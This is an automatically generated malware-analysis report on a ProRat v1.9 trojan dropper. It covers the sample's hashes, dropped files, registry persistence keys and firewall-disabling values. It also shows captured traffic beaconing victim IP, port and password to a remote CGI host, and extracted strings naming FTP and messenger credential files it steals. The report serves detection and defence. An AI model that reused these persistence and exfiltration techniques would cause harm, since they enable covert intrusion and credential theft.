Gen.Variant.Graftor.Elzob.15658_da3e304cde

Trojan-Dropper.Win32.Agent.bczn (Kaspersky), Gen:Variant.Graftor.Elzob.15658 (B) (Emsisoft), Gen:Variant.Graftor.Elzob.15658 (AdAware), Trojan.Win32.Bumat.FD, VirusParite.YR (Lavasoft MAS) Behaviour: ...
Blog rating:2 out of5 with1 ratings

Gen.Variant.Graftor.Elzob.15658_da3e304cde

by malwarelabrobot on October 30th, 2016 in Malware Descriptions.

Trojan-Dropper.Win32.Agent.bczn (Kaspersky), Gen:Variant.Graftor.Elzob.15658 (B) (Emsisoft), Gen:Variant.Graftor.Elzob.15658 (AdAware), Trojan.Win32.Bumat.FD, VirusParite.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Virus


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: da3e304cdec0de2b244930fbf824b069
SHA1: a8aa0839b5b575bbb5aaa062979db6a017b718b0
SHA256: 4f24fb491361e2a479a6d2cb18f694ad4ccb79c0177842f72bd4c9b7ab772843
SSDeep: 12288:QqmpplpGoGL3etQoMiXM8gxf/Sj4yy1ri9vIhdPOQGXw8:C563ey8gZqj4ySiydPOQGH
Size: 473392 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: FSGv133Eng_v1, FSGv133Eng_v2, FSGv133, UPolyXv05_v6
Company: no certificate found
Created at: 1987-09-11 05:35:02
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:2448
fservice.exe:2124
lncom.exe:3676

The Trojan injects its code into the following process(es):

DllHost.exe:3652
services.exe:3188

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2448 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\DA3E30~1.EXE.bat (75 bytes)
C:\Windows\System32\lncom_.jpg (14764 bytes)
C:\da3e304cdec0de2b244930fbf824b069.jpg (601 bytes)
C:\Windows\System32\lncom.exe (45172 bytes)

The process fservice.exe:2124 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\services.exe (2457 bytes)
C:\Windows\system\sservice.exe (2105 bytes)

The Trojan deletes the following file(s):

C:\Windows\System32\fservice.exe (0 bytes)
C:\Windows\system\sservice.exe (0 bytes)

The process lncom.exe:3676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\lncom.exe.bat (103 bytes)
C:\Windows\System32\fservice.exe (2457 bytes)
C:\Windows\system\sservice.exe (2105 bytes)

Registry activity

The process DllHost.exe:3652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "DllHost.exe"

The process %original file name%.exe:2448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{FFE2A43C-56B9-4BF5-9A79-CC6D4285608A} {00000122-0000-0000-C000-000000000046} 0xFFFF" = "01 00 00 00 00 00 00 00 0B 14 6F 38 00 32 D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process lncom.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"DirectX For Microsoft® Windows" = "C:\Windows\system32\fservice.exe"

[HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings]
"ICQ_UIN" = "083/079/0/010"
"LanNotifie" = ""

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}]
"StubPath" = "C:\Windows\system\sservice.exe"

[HKCU\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings]
"Bulas" = "1"
"Kurban_Ismi" = "whbuhl"
"XP_FW_Disable" = "1"
"XP_SYS_Recovery" = "1"
"Hata" = ""
"Port" = "4001"
"Sifre" = "5399086"
"Mail" = "j`oedlhs/tAfl`hm/bnl"
"ICQ_UIN2" = "046007686"
"FW_KILL" = "1"

"Online_List" = "iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh"
"KSil" = "1"

The Trojan adds the reference to itself to be executed when a user logs on:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "Explorer.exe C:\Windows\system32\fservice.exe"

Dropped PE files

MD5 File path
b1a76fee69ad8e00fab94744a78846d8 c:\Windows\System32\fservice.exe
562e0d01d6571fa2251a1e9f54c6cc69 c:\Windows\System32\reginv.dll
b4c72da9fd1a0dcb0698b7da97daa0cd c:\Windows\System32\winkey.dll
b1a76fee69ad8e00fab94744a78846d8 c:\Windows\services.exe
b1a76fee69ad8e00fab94744a78846d8 c:\Windows\system\sservice.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
4096 8192 0 0 d41d8cd98f00b204e9800998ecf8427e
12288 4096 4096 3.48055 a96093b6bd87aa091fb35a0e938b45c8

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.ovip.icq.com/friendship/email_thank_you.php?folder_id=18984&params_count=0&nick_name=Pro_Rat&[email protected]&user_uin=&friend_nickname=&friend_contact=157116797&friend_nickname2=&friend_contact2=&x=60&y=15
hxxp://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=WIN_UK_FFOO__I_&ipadresi=192.168.11.132&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-10&serversaati=7:19:40_PM&servertarihi=10/29/2016&serversifre=4288197&islem=log 103.224.182.209
hxxp://www.icq.com/friendship/email_thank_you.php?folder_id=18984&params_count=0&nick_name=Pro_Rat&[email protected]&user_uin=&friend_nickname=&friend_contact=157116797&friend_nickname2=&friend_contact2=&x=60&y=15 178.237.20.20
hxxp://www.yoursite.comhxxp://www.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=WIN_UK_FFOO__I_&ipadresi=192.168.11.132&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-10&serversaati=7:19:40_PM&servertarihi=10/29/2016&serversifre=4288197&islem=log 103.224.182.209


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY ICP Email Send via HTTP - Often Trojan Install Reports

Traffic

GET hXXp://VVV.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=WIN_UK_FFOO__I_&ipadresi=192.168.11.132&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-10&serversaati=7:19:40_PM&servertarihi=10/29/2016&serversifre=4288197&islem=log HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: VVV.yoursite.com
Connection: Keep-Alive


HTTP/1.1 302 Found
Date: Sat, 29 Oct 2016 16:19:28 GMT
Server: Apache
X-Powered-By: PHP/5.4.45-0 deb7u5
Set-Cookie: __tad=1477757968.3924646; expires=Tue, 27-Oct-2026 16:19:28 GMT
Location: hXXp://ww38.yoursite.com/cgi-bin/prorat.cgi?bilgisayaradi=WIN_UK_FFOO__I_&ipadresi=192.168.11.132&serverportu=5110&kurban=victim&servermodeli=V1.9:Fix-10&serversaati=7:19:40_PM&servertarihi=10/29/2016&serversifre=4288197&islem=log
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8



GET /friendship/email_thank_you.php?folder_id=18984¶ms_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=157116797&friend_nickname2=&friend_contact2=&x=60&y=15 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: hXXp://VVV.icq.com/friendship/pages/send_by_email_18984.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.icq.com
Connection: Keep-Alive
Cookie: geo=359; adsPopup0=1098232990103


HTTP/1.1 404
Server: nginx/1.10.1
Date: Sat, 29 Oct 2016 16:19:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=75
X-Powered-By: PHP/5.6.25
Set-Cookie: lazy_message=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.icq.com
X-XSS-Protection: 1; mode=block; report=hXXps://cspreport.mail.ru/xxssprotection
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
3be0..<!doctype html>.<html lang="en" class="en" itemscope it
emtype="hXXps://schema.org/Product">.<head>..<title>ICQ
 with video calls, free messages and low-cost phone calls</title>
;..<meta http-equiv="Content-Type" content="text/html; charset=utf-
8" />..<meta http-equiv="content-language" content="en" />..&
lt;meta name="description" content="Download ICQ on your PC and start 
using high quality video chat, free messaging and make low-cost phone 
calls to any country"/>....<meta name="keywords" content="ICQ fo
r Windows, ICQ for PC, video calls, free chat, free messaging app, fre
e group chat, free file sharing, low-cost phone calls, cheap phone cal
ls" />..<link rel="canonical" href="hXXps://icq.com/whitepages/c
md.php?uin=298178049&action=message" />......<meta content="
//c.icq.com/images/tint/common/share/share_560.png" name="og:image""&g
t;...........<link rel="stylesheet" type="text/css" href="/cached/c
ss/93c533a0833db6a1d100467c40e89863.css" />...<script>...var 
GEOLANG = 'en';...window.geolang = 'en';..</script>...<script
 type="text/javascript" src="/cached/js/93c533a0833db6a1d100467c40e898
63.js"></script>...<script type="text/javascript" src="//c
.icq.com/assets/js/tint/partnerid.js"></script>..<script t
ype="text/javascript">.....var _gaq = _gaq || [];..._gaq.push(["_se
tAccount", "UA-19019454-1"]);..._gaq.push(["_setDomainName", ".icq.com
"]);..._gaq.push(["_setAllowHash", false]);..._gaq.push(["_setCust
<<< skipped >>>






The Trojan connects to the servers at the folowing location(s):







DllHost.exe_3652:




.text
`.data
.rsrc
@.reloc
KERNEL32.dll
msvcrt.dll
ole32.dll
ntdll.dll
dllhost.pdb
_wcmdln
_amsg_exit
6.1.7600.16385 (win7_rtm.090713-1255)
dllhost.exe
Windows
Operating System
6.1.7600.16385

services.exe_3188:




.rsrc
Port
LocalPort
PeerPort
SocksPort
SocksPassword
wsock32.dll
Unable to load wsock32.dll Error #
%s: WSAStartup error #%d
0.0.0.0
Cannot change Port if not closed
Cannot change LocalPort if not closed
255.255.255.255
WSocketResolveHost: Cannot convert host address '%s', Error #%d
WSocketResolvePort: Invalid Port.
WSocketResolvePort: Cannot convert port '%s', Error #%d
WSocketResolveProto: Cannot convert protocol '%s', Error #%d
GetPeerPort
%s: can't start DNS lookup, error #%d
winsock.bind failed, error #%d
winsock.getsockname failed, error #%d
Connect: No Port Specified
listen: port not assigned
Winsock.GetHostName failed
Operation would block
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported on socket
Protocol family not supported
Address family not supported by protocol family
WinSock DLL cannot support this application
Can't change socks port if not closed
Listening is not supported thru socks server
tcp is the only protocol supported thru socks server
Uh.xC
0.0.0.1
command not supported
address type not supported
TFtpString
TFtpServer (c) 1998-2000 F. Piette V1.08
FtpServerException
FtpSrv
TFtpSrvAuthenticateEvent
TFtpCtrlSocket
Password
TFtpSrvChangeDirectoryEvent
TFtpSrvBuildDirectoryEvent
TFtpSrvClientConnectEvent
TFtpSrvDataSessionConnectedEvent
TFtpSrvClientCommandEvent
Keyword
TFtpSrvAnswerToClientEvent
TFtpString@
TFtpSrvValidateXferEvent
TFtpSrvDataAvailableEvent
TFtpSrvRetrDataSentEvent
TFtpSrvCommandProc
TFtpSrvCommandTableItem
TFtpServer
220 ICS FTP Server ready.
PORT
500 '%s': command not understood.
331 Password required for %s.
503 Login with USER first.
230 User %s logged in.
530 Login incorrect.
$530 Please login with USER and PASS.
250 CWD command successful. "%s" is current directory.
501 CWD failed. %s
257 "%s" is current directory.
200 Port command successful.
501 Invalid PORT command.
150 Opening data connection for %s.
501 Cannot STOR. %s
ftp-data
426 Connection closed; %s.
426 Connection closed; transfer aborted. Error #%d
501 Cannot RETR. %s
451 Failed: %s.
1 ftp ftp
%s %2.2d
200 Type set to %s.
500 'TYPE %s': command not understood.
250 File '%s' deleted.
450 File '%s' can't be deleted.
550 '%s': no such file or directory.
213 %d
550 Command failed: %s.
350 REST supported. Ready to resume at byte offset %d.
501 Syntax error in parameter: %s.
553 '%s': file already exists.
250 File '%s' renamed to '%s'.
450 File '%s' can't be renamed.
200 Ok. Parameter was '%s'.
550 '%s': can't create directory.
550 '%s': file or directory already exists.
257 '%s': directory created.
150 APPE supported. Ready to append file "%s" at offset %d.
200 Ok. STRU parameter '%s' ignored.
550 '%s': no such directory.
250 '%s': directory removed.
550 '%s': can't remove directory.
227 Entering Passive Mode (127,0,0,1,%d,%d).
227 Entering Passive Mode (%d,%d,%d,%d,%d,%d).
500 PASV exception: '%s'.
213 %s
550 %s
SMTP component (c) 1997-2000 F. Piette V2.17
SmtpException
SmtpProt
TSmtpState
smtpReady
smtpDnsLookup
smtpConnecting
smtpConnected
smtpInternalReady
smtpWaitingBanner
smtpWaitingResponse
smtpAbort
TSmtpRequest
smtpConnect
smtpHelo
smtpMailFrom
smtpVrfy
smtpRcptTo
smtpData
smtpQuit
smtpRset
smtpOpen
smtpMail
smtpCustom
TSmtpFct
smtpFctNone
smtpFctHelo
smtpFctConnect
smtpFctMailFrom
smtpFctRcptTo
smtpFctData
smtpFctVrfy
smtpFctQuit
smtpFctRset
TSmtpFctSet
TSmtpContentType
smtpHTML
smtpPlainText
TSmtpDisplay
TSmtpHeaderLineEvent
TSmtpProcessHeaderEvent
TSmtpGetDataEvent
MsgLine
TSmtpRequestDone
TSmtpAttachmentContentType
TSmtpAttachHeader
TSmtpNextProc
TCustomSmtpClient
TSmtpCli
TSmtpClid
OnProcessHeader8
TSyncSmtpCli
smtp
SMTP component not ready
SMTP component not connected
SMTP component already connected
426 Operation aborted.
FtpSrvT (c) 1999-2000 F. Piette V1.02
TFtpCtrlSocket (c) 1998-2000 F. Piette V1.06
EFtpCtrlSocketException`_D
EFtpCtrlSocketExceptionD_D
FtpSrvC
TFtpCtrlState
ftpcInvalid
ftpcWaitingUserCode
ftpcWaitingPassword
ftpcReady
ftpcWaitingAnswer
TFtpCmdType
ftpcPORT
ftpcSTOR
ftpcRETR
ftpcCWD
ftpcXPWD
ftpcPWD
ftpcUSER
ftpcPASS
ftpcLIST
ftpcRMD
ftpcTYPE
ftpcSYST
ftpcQUIT
ftpcDELE
ftpcRNFR
ftpcMKD
ftpcRNTO
ftpcNOOP
ftpcNLST
ftpcABOR
ftpcCDUP
ftpcSIZE
ftpcREST
ftpcAPPE
ftpcSTRU
ftpcMDTM
TFtpOption
ftpcUNC
TFtpOptions
CmdBuf
CmdLen
FtpState
PassWordT
220-ICS FTP Server ready
ssHorizontal
OnKeyDown
OnKeyPress
OnKeyUp
windows
AutoHotkeysd2E
AutoHotkeys
:].tJ
EInvalidGraphicOperation
KeyPreview
WindowStated4E
ssHotTrack
TWindowState
poProportional
TWMKey
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
TDragOperation
TKeyEvent
TKeyPressEvent
crSQLWait
%s (%s)
IMM32.DLL
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
comctl32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
kernel32.dll
Portions Copyright (c) 1983,99 Borland
%u8F3
iphlpapi.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
advapi32.dll
shell32.dll
.text
.rdata
.data
.reloc
.aspack
.adata
>%U:f{
MFC42.DLL
MSVCRT.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
hodll.dll
mfc42.dll
msvcrt.dll
`.rdata
@.data
.HookSec
B[ ProRat v1.9 Trojan Horse - Coded by PRO Group - Made in Turkey ]
GetCPInfo
TESTDLL.dll
RegEnumKeyW
Advapi32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
0'04090?0
TCP[R[P;PMP
TCMD@TG;PMP
SFTC &úWLW;PMP
CESB&%F;PMP
151.164.23.201
aku.edu.tr
atauni.edu.tr
ege.edu.tr
ankara.edu.tr
192.168.0.1
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
cuteftp
Login :
Password :
Pass :
SOFTWARE\Microsoft\Windows\CurrentVersion
%Program Files%
\GlobalSCAPE\CuteFTP\sm.dat
\GlobalSCAPE\CuteFTP\smdata.dat
\CuteFTP\tree.dat
\CuteFTP\smdata.dat
\GlobalSCAPE\CuteFTP Pro\sm.dat
\GlobalSCAPE\CuteFTP\5.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings
\RSACi.rat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\hXXp://VVV.rsac.org/ratingsv01.html
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\
PRNumURLExpressions
PRBUPort
PRBUUrl
Sites.dat
Password :
Port :
Tport_atm=0
\reg_ent.reg
regedit.exe /s
\winrar.exe
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\
d_.exe
winoa386.mod
\scrpt.bat
\scrpt.vbs
\winkey.dll
\reginv.dll
127.0.0.1
.jpeg
\win.ini
\system.ini
Explorer.exe
del %c%s%c
if exist %c%s%c goto 1
del À
\system32\fservice.exe
\system\sservice.exe
\mps.atm
\kdd32.atm
\system32\winkey.dll
\system\winkey.dll
\system32\wininv.dll
\system\wininv.dll
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Explorer.exe
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag
GET /friendship/email_thank_you.php?folder_id=18984¶ms_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=
&friend_nickname2=&friend_contact2=&x=60&y=15 HTTP/1.1
Referer: hXXp://VVV.icq.com/friendship/pages/send_by_email_18984.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.icq.com
Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\autoexec.bat
\p_ekran.jpg
services.exe
msn.ini
yahoo.ini
Windows Ver :
Windows Language :
Windows Path :
software\microsoft\windows\currentversion
VVV.icq.com
Port :
Password :
Microsoft Outlook Express 6.00.2800.1158
\p_ekran.bmp
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings
Tport
Pplugin1.dll
Pplugin2.dll
Pplugin3.dll
Pplugin4.exe
Pplugin4.dat
Pplugin4.exe /stext
ktd32.atm
Pplugin8.exe
PpluginCd.dll
Pplugin9.dat
Pplugin8.exe /stext
Pplugin10xa.exe
Pplugin10xa.exe /stext
winp9.exe
winp9.exe /stext
eimsn.exe
winrar.exe
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
\services.exe
Windows services
Windows Logon Service
Online_List_atm=iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh
Port_atm=4001
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
shutdown.exe -s -t 00
shutdown.exe -r -t 00
shutdown.exe -l
\refresh.scf
CONTROL.EXE desk.cpl
CONTROL.EXE hdwwiz.cpl
CONTROL.EXE inetcpl.cpl
CONTROL.EXE appwiz.cpl
CONTROL.EXE intl.cpl
CONTROL.EXE joy.cpl
CONTROL.EXE access.cpl
CONTROL.EXE main.cpl
CONTROL.EXE ncpa.cpl
CONTROL.EXE nusrmgr.cpl
CONTROL.EXE timedate.cpl
CONTROL.EXE mmsys.cpl
CONTROL.EXE powercfg.cpl
CONTROL.EXE sysdm.cpl
CONTROL.EXE telephon.cpl
CONTROL.EXE odbccp32.cpl
\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
////////// URL HISTORY //////////
url10
url11
url12
url13
url14
url15
url16
url17
url18
url19
url20
url21
url22
url23
url24
url25
00010pPassword Decrypt Error!
SMTP
\ICQ\Icq.exe
\Messenger\msmsgs.exe
\MSN Messenger\msnmsgr.exe
\Yahoo!\Messenger\YPager.exe
\Outlook Express\msimn.exe
\GlobalSCAPE\CuteFTP\cutftp32.exe
\NetMeeting\conf.exe
notepad.exe
mspaint.exe
wordpad.exe
calc.exe
\WinZip\WINZIP32.EXE
\WinRAR\WinRAR.exe
cmd.exe
command.com
\Internet Explorer\IEXPLORE.EXE
wmplayer.exe
\Winamp\winamp.exe
\Real\RealOne Player\realplay.exe
\QuickTime\QuickTimePlayer.exe
\Movie Maker\moviemk.exe
\FlashGet\flashget.exe
_ReadCdKeys
&serverportu=
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
[email protected]
<[email protected]>
FtpServer1
FtpServer2
SmtpCli1
FtpServer1Authenticate
FtpServer2Authenticate
FormKeyDown
SmtpCli1RequestDone
FtpServer1ChangeDirectory
Memo2KeyDown
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Broken pipe
Operation not permitted
%H:%M:%S
%m/%d/%y
%A, %B %d, %Y
d/d/d d:d:d.d
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
elemType->tpClass.tpcFlags & CF_HAS_DTOR
C:\Windows\
Project1.exe
@$xp$16Ftpsrv@FtpSrv__3
@$xp$17Ftpsrv@TFtpServer
@$xp$17Ftpsrv@TFtpString
@$xp$17Smtpprot@TSmtpCli
@$xp$17Smtpprot@TSmtpFct
@$xp$18Ftpsrvc@TFtpOption
@$xp$19Ftpsrvc@TFtpCmdType
@$xp$19Ftpsrvc@TFtpOptions
@$xp$19Smtpprot@TSmtpState
@$xp$20Smtpprot@TSmtpFctSet
@$xp$21Ftpsrvc@TCommandEvent
@$xp$21Ftpsrvc@TDisplayEvent
@$xp$21Ftpsrvc@TFtpCtrlState
@$xp$21Smtpprot@TSmtpDisplay
@$xp$21Smtpprot@TSmtpRequest
@$xp$21Smtpprot@TSyncSmtpCli
@$xp$22Ftpsrvc@TFtpCtrlSocket
@$xp$22Smtpprot@SmtpException
@$xp$22Smtpprot@TSmtpNextProc
@$xp$25Ftpsrv@FtpServerException
@$xp$25Ftpsrv@TFtpSrvCommandProc
@$xp$25Smtpprot@TSmtpContentType
@$xp$25Smtpprot@TSmtpRequestDone
@$xp$26Ftpsrv@TFtpCtrlSocketClass
@$xp$26Smtpprot@TCustomSmtpClient
@$xp$26Smtpprot@TSmtpAttachHeader
@$xp$26Smtpprot@TSmtpGetDataEvent
@$xp$29Smtpprot@TSmtpHeaderLineEvent
@$xp$30Ftpsrv@TFtpSrvCommandTableItem
@$xp$31Ftpsrv@TFtpSrvAuthenticateEvent
@$xp$31Ftpsrv@TFtpSrvRetrDataSentEvent
@$xp$31Ftpsrv@TFtpSrvValidateXferEvent
@$xp$31Ftpsrvc@EFtpCtrlSocketException
@$xp$32Ftpsrv@TFtpSrvClientCommandEvent
@$xp$32Ftpsrv@TFtpSrvClientConnectEvent
@$xp$32Ftpsrv@TFtpSrvDataAvailableEvent
@$xp$32Smtpprot@TSmtpProcessHeaderEvent
@$xp$33Ftpsrv@TFtpSrvAnswerToClientEvent
@$xp$33Ftpsrv@TFtpSrvBuildDirectoryEvent
@$xp$34Ftpsrv@TFtpSrvChangeDirectoryEvent
@$xp$35Smtpprot@TSmtpAttachmentContentType
@$xp$39Ftpsrv@TFtpSrvDataSessionConnectedEvent
@Ftpsrv@CopyRight
@Ftpsrv@Finalization$qqrv
@Ftpsrv@FtpServerException@
@Ftpsrv@Register$qqrv
@Ftpsrv@TFtpServer@
@Ftpsrv@TFtpServer@$bctr$qqrp18Classes@TComponent
@Ftpsrv@TFtpServer@$bdtr$qqrv
@Ftpsrv@TFtpServer@AddCommand$qqrx17System@AnsiStringxynpqqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2$v
@Ftpsrv@TFtpServer@BuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%p15Classes@TStreamo
@Ftpsrv@TFtpServer@ClientCommand$qqrp14System@TObjectpci
@Ftpsrv@TFtpServer@ClientDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientPassiveSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorDataAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@CommandABOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandAPPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCDUP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandChangeDir$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDELE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2o
@Ftpsrv@TFtpServer@CommandLIST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMDTM$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMKD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNLST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNOOP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
